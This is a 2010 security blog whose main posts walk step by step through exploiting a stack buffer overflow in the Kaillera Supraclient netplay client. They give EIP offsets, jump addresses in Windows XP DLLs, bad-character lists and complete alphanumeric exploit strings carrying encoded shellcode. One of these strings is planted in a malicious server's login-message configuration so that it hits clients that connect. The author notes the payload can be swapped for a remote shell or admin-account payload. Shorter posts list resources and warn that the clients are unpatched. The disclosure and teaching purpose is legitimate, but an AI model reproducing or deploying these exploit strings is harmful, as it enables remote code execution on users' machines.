Thursday, November 25, 2010

0day Remote Buffer Overflow Vulnerability in Kaillera Supraclient

Most if not all Kaillera clients have very bad input validation.  They accept almost anything from the Kaillera server in the form of messages, meaning there are some serious issues with remote buffer overflow exploits.

This particular post discloses a remote buffer overflow vulnerability in Supraclient.

Note: If you are unfamiliar with how buffer overflow exploits work, please stop by Corelan for some great tutorials on the subject. Additionally, please visit my previous blog post if anything here is unclear, as it is explained in greater depth there.

Vectors for Attack:
-Malicious user hosts a server, names it the same as a popular server, and gets people to join his server.
-Malicious user then places alphanumeric shellcode in the server configuration file, executes shellcode on victim's computer.

To reproduce this, let's first download and configure our server.  In this case, we'll be using the freely available open source project , Emulinker server.  After unzipping it, go to the conf folder.  Two files will need to be edited: language.properties and emulinker.cfg.

Make the following change to Emulinker.cfg:

controllers.v086.bufferSize=10000

This will ensure that we have more than plenty buffer space for our payload.

We will go on to edit the language.properties file in a moment to put our shellcode in it.  But first, let's walk through the entire process of finding and exploiting this vulnerability.  It will be fairly similar to the last post, but still could be useful.

Let's first test this vulnerability with a pattern of 2500 bytes.  We'll test it in the server MOTD message, although it can probably be triggered in most any server message.

Using the pvefindaddr plugin and Immunity Debugger from the previous post, let's generate the pattern:

!pvefindaddr pattern_create 2500

By default, in the language.properties file, there is a section which looks like this:


# Login Announcements
KailleraServerImpl.LoginMessage.1=Welcome to a new EmuLinker Server!
KailleraServerImpl.LoginMessage.2=Edit language.properties to setup your login announcements

Let's comment out the second message, and replace the first message with our long string pattern.


# Login Announcements
KailleraServerImpl.LoginMessage.1=Welcome to a new EmuLinker Server!
#KailleraServerImpl.LoginMessage.2=Edit language.properties to setup your login announcements


So now it should look like this:

# Login Announcements
KailleraServerImpl.LoginMessage.1=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D
#KailleraServerImpl.LoginMessage.2=Edit language.properties to setup your login announcements

Save the file in your text editor and go back to the main emulinker folder.  Launch server.bat to start the emulinker server.  (If you get an error message, you'll need to install the latest version of Java first).

Now we need a vulnerable client to connect to the server to see if we can crash it.  Grab a copy of Project64K and Supraclient, replacing the kailleraclient.dll in the Project64K folder with the Supraclient dll you downloaded, and run Project64K with Immunity Debugger attached to it.  Connect to the malicious server IP.

Immunity Debugger shows EIP to be overwritten with part of our pattern, so let's find out at what point this happened.  Type !pvefindaddr pattern_offset with the offset of our pattern, in this case, its 0x33714332

in other words, !pvefindaddr pattern_offset 0x33714332

Now go to the Log window in Immunity (from the View menu).  It is clear that the pattern overwrite occurred at 2048 bytes.  So we know that we need 2048 junk bytes and then 4 bytes to control EIP, followed by our shellcode.  Let's create a 2048 byte pattern now with pvefindaddr, and add 4 B's after it to see if EIP is overwritten with B"s.  Then let's put 6 C"s to make sure our code is on the stack.

Oh good, we can see that EIP was overwritten with B's and the C"s come next.  Now we must replace the B"s with an actual hexadecimal address in memory of an instruction allowing us to jump to the stack.  The most common is JMP ESP, but we will use pvefindaddr to search for suitable locations throughout memory.

!pvefinddadr  typed by itself without arguments shows a help menu in the Log file.  Let's view that, and notice that !pvefindaddr j -r esp is what we want to search for jump to the stack instructions.   This is useful to save us time, especially since we're dealing with character restrictions.  We can only use a subset of extended-ascii characters in our payload, so the jump opcode must reflect that.

Once pvefindaddr has run, we can find the j.txt file in the Immunity Debugger folder which contains all the suitable memory addresses.  We need an address which is ascii-compatible, so let's search for that in the file.

Okay, we found a push esp - ret instruction at 0x774F3624 in ole32.dll, which means our payload will only work in a specific windows version.   Let's translate the hex into ascii, using the ascii-table website linked to earlier.  We get $6Ow, so we'll replace
BBBB with wO6$.  Let's leave the C's for now and test our jump to the stack first.  We can set a breakpoint at 0x774F3624 to confirm we hit it.  Good.

Finally, we need to use Alpha3 in order to make shellcode which is alphanumeric compatible, and in this case which uses a base register of ESP (the stack).  In this case I'm using a metasploit generated payload with calc.exe as a PoC.

Putting it all together, let's edit the language.properties file one last time:


# Login Announcements
KailleraServerImpl.LoginMessage.1=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq$6OwTYhffffk4diFkDql02Dqm0D1CuEE5n3e1o3j3J0M0y0C363z7n2t4y4A0g0h0r0K2N4p4R8K0m0J7L3P3l14094L123i2p4F0Q3U4x4F3p0I0r5n0h2j0W4O2o3M0W0c4Y0U0y2r4K370T3U0H3n0J143W2G4n0N4K2O0C1k312t4H1L4E2v1N2H3B3H4J3W0I0O311L2G2q4y0c3c0c4x3z0T4p3S4s0H0g000P184Q0f3m4L3d4G3e054k3R4Z35063m2v3A2n0U404S8O0e0R3q7l0h4q0w4w3i0L0d0k3O0K4T042t3K0J3h0t
#KailleraServerImpl.LoginMessage.2=Edit language.properties to setup your login announcements


Re-run the server.bat file, relaunch the client and connect to it.  Boom, calculator has appeared!


We have successfully exploited a remote buffer overflow in Supraclient!

Wednesday, October 6, 2010

Supraclient Kaillera Buffer Overflow Vulnerability

Today I will release information about a Supraclient kaillera buffer overflow 0 day vulnerability.  I have decided it makes sense to disclose this vulnerability because Supraclient is very old and very obscure.

First of all we need the vulnerable version of Supraclient kaillera client.

Note: This exploit is probably has no practical attack vectors at all, this is mostly just an exploit for practice.

The target system is Windows XP SP3 running in a virtual machine (VMware Workstation 7 to be precise).
This is because Windows XP is easier to exploit (it lacks advanced protections such as DEP and ASLR that later versions of Windows have).  Additionally, according to some statistics, 66% of users who have Windows still run XP. 

In this particular example, the amount of bytes required to cause the buffer overflow remains the same on any virtual machine, but be aware sometimes they will change based on your environment, so experimenting yourself is important.

This post deals with information about buffer overflows; if you're not familiar with them, you can learn more at Corelan.  This is an excellent site full of tutorials about buffer overflows and how to exploit them on a Windows environment.  I recommend that you read a few tutorials (such as part 1 and 2 on stack overflows) on that website before you continue to fully understand what is happening.

As a brief overview, a buffer overflow is nothing but overflowing a region in memory with user input of some kind.  Most if not all security vulnerabilites come from badly processed user input.  Some vulnerable C/C++ functions such as the classic strcat and strcpy will copy a number of bytes from one memory location
to another without any kind of bounds checking.  If these functions are used to process user  input of some kind, a user can specify more bytes than the buffer has been declared to hold.  For instance, if we supply 20 bytes of input to a 15 byte buffer, we have a buffer overflow.  The EIP register, which is an area in memory that points to the next instruction to be processed, will be overwritten with our data, meaning we can specify
an arbitrary hexadecimal value that can point to any CPU assembly instructions we want, and therefore hijack
the program's execution to execute any code we desire in memory.  Thus a buffer overflow is one of the most serious types of vulnerabilities as it allows for total control over a computer in most cases. 

With that being said, let's begin.  First, we will extract the Supraclient dll file we have downloaded into the emulator folder of Project64k, overwriting the existing kailleraclient.dll file with the Supraclient dll file.

Next, download two very useful tools: Immunity Debugger and Pvefindaddr plugin:.  These will help us as we develop our exploit.  The Pvefindaddr plugin needs to be copied into the Immunity Debugger Commands folder before it can be used (C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands\pvefindaddr.py)


Open Immunity Debugger and type !pvefindaddr pattern_create 2200 in the text box area and hit enter.

This will create a cyclic pattern of 2200 bytes which we will feed into the program to see if it will crash.
 This is useful because if we only used the same character, for example, 2200 "A's", we wouldnt know the specific 4 bytes that overwrote EIP (because they are all A's, so whats the difference).  This is where the unique pattern comes in handy to quickly identify how many bytes it takes to overwrite the memory location EIP points to.

To copy the output of the cyclic pattern, open the directory Immunity was installed (usually C:\Program Files\Immunity Inc\Immunity Debugger\) and open the file called mspattern.txt.  Then copy that string to the clipboard.

Next we launch Project64K. Go to Start>Net Play, and the Kaillera GUI window will open up.  Paste the mspattern.txt string into the window in the lower left (the one which says IP Address in the screenshot):


Now go to Immunity Debugger and go to File>Attach, and pick the process which is running Kaillera (in our example its Project64k.exe) and click Attach.  If you see any messages about "Entry Point Alert" just click past them by clicking OK.  Now hit F9 (or click the red play button in Immunity) to start the debugging.  Go back to Kaillera and click Login. 

Boom.  Immunity triggers an access violation when executing (part of your cyclic pattern):


As you can see, EIP is overwritten with 33714332, which is hexadecimal for the string "2cQ3", which is part of our mspattern.txt.  How do we know how many bytes it takes before we reach 2cQ3?  Type !pvefindaddr pattern_offset 0x33714332 in order to see how many bytes we need to hit the EIP overwrite.  Once you hit enter, go to View> Log, and you will note that the pattern is reached after 2048 bytes.  This means that we need to supply 2048 bytes of junk and then 4 bytes to overwrite EIP.

We need to overwrite EIP with a pointer which will allow us to jump to the stack, so that the rest of our user input will be executed as code (our shellcode).  Which four bytes do we choose?  We can either use an application-specific jump, which would only work on one emulator, or we can use an OS-specific jump, which only works on particular versions of Windows.  For now I am going to use an OS-specific opcode, JMP ESP in hnetcfg.dll (ascii of O².f, hex of 662EB24F), which would work for any emulator on a specific Windows XP version. JMP ESP tells the computer to jump to the stack, which will then execute whatever code we place after those 4 bytes at EIP.

But wait a minute! This is a text box, we can't just put random binary characters in here.  This is correct.  We have to deal with character restrictions.  In this case, as I have experimented to find out, we are dealing with mostly extended-ascii limitations, meaning we can use more characters than just a-z. Our bad characters in hex are the following: 00-1F,7F, and 81-9F.  Any other characters in the 255 character extended-ascii set are fair game however. 

Let's now generate an alphanumeric shellcode using Alpha3.  This tool will require us to have a base register for the shellcode it needs to run in order to decode characters.  In this case, we give it the register of ESP (the stack) since we know that our shellcode is directly at the beginning of the stack and doesn't seem to get mangled.  This particular shellcode will be given to Alpha3 as a metasploit encoded calc.exe payload (as a simple demonstration).  However, its easy enough to replace that with a payload that adds an admin account, or a remote shell, or a meterpreter payload...
 
So our entire exploit string ends up looking like this: 

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1CqO².fTYhffffk4diFkDql02Dqm0D1CuEE5n3e1o3j3J0M0y0C363z7n2t4y4A0g0h0r0K2N4p4R8K0m0J7L3P3l14094L123i2p4F0Q3U4x4F3p0I0r5n0h2j0W4O2o3M0W0c4Y0U0y2r4K370T3U0H3n0J143W2G4n0N4K2O0C1k312t4H1L4E2v1N2H3B3H4J3W0I0O311L2G2q4y0c3c0c4x3z0T4p3S4s0H0g000P184Q0f3m4L3d4G3e054k3R4Z35063m2v3A2n0U404S8O0e0R3q7l0h4q0w4w3i0L0d0k3O0K4T042t3K0J3h0t

Once we paste this into the emulator, it goes boom:


Woot!  Calc.exe has been executed!  We have successfully executed a stack buffer overflow against kaillera Supraclient!

Tuesday, August 24, 2010

Kaillera Resources

Okay, let's dive into the wild world of Kaillera and where we can find useful information about it.

An open source kaillera client is available here: http://sourceforge.net/projects/okai/files/

An open source kaillera server is available here: http://sourceforge.net/projects/emulinker/files/emulinker-kaillera-server/

The best known documentation of the kaillera protocol is here: http://www.emulinker.org/index.php?page=Kaillera_Network_Protocol

To run Kaillera, we need:

-Game system emulator (n64, mame, etc); http://www.emulinker.org/index.php?page=Emulators

-Kaillera client.dll (standard emulators come with this client) : http://www.kaillera.com

This can be replaced by overwriting it in the directory with a new kailleraclient.dll file.

Note: By downloading these programs you do so at your own risk, as they are known to have unfixed security vulnerabilities.  The kaillera.com client in particular is probably 8 years old and has some issues.


 Several alternate clients used are Ownaclient, Supraclient, and the open kaillera client I mentioned above.

However, all of these clients contain numerous vulnerabilities, including remote buffer overflows.

The unique problem of Kaillera security is that there are no active developers out there right now who can fix these issues, and all known kaillera clients are vulnerable.  Therefore, I will have to say less than I desire to protect the users at the moment.

For the safety of Kaillera end users, someone needs to help patch these programs or simply release a new, better coded kaillera client.  Please contact me if you have any suggestions or solutions regarding this.

Monday, August 23, 2010

First Kaillera Blog Post!

Hello everyone,

Welcome to my blog!  This will be a useful place for me to post on Kaillera, as I have been spending a lot of time this summer trying to figure out the network protocol, writing a pretty basic client in perl for it, as well as looking at various security issues in kaillera clients and servers.

This blog will be updated with various details of those things no doubt.  I will keep security information rather vague for now since many issues remain to be fixed. 

Enjoy!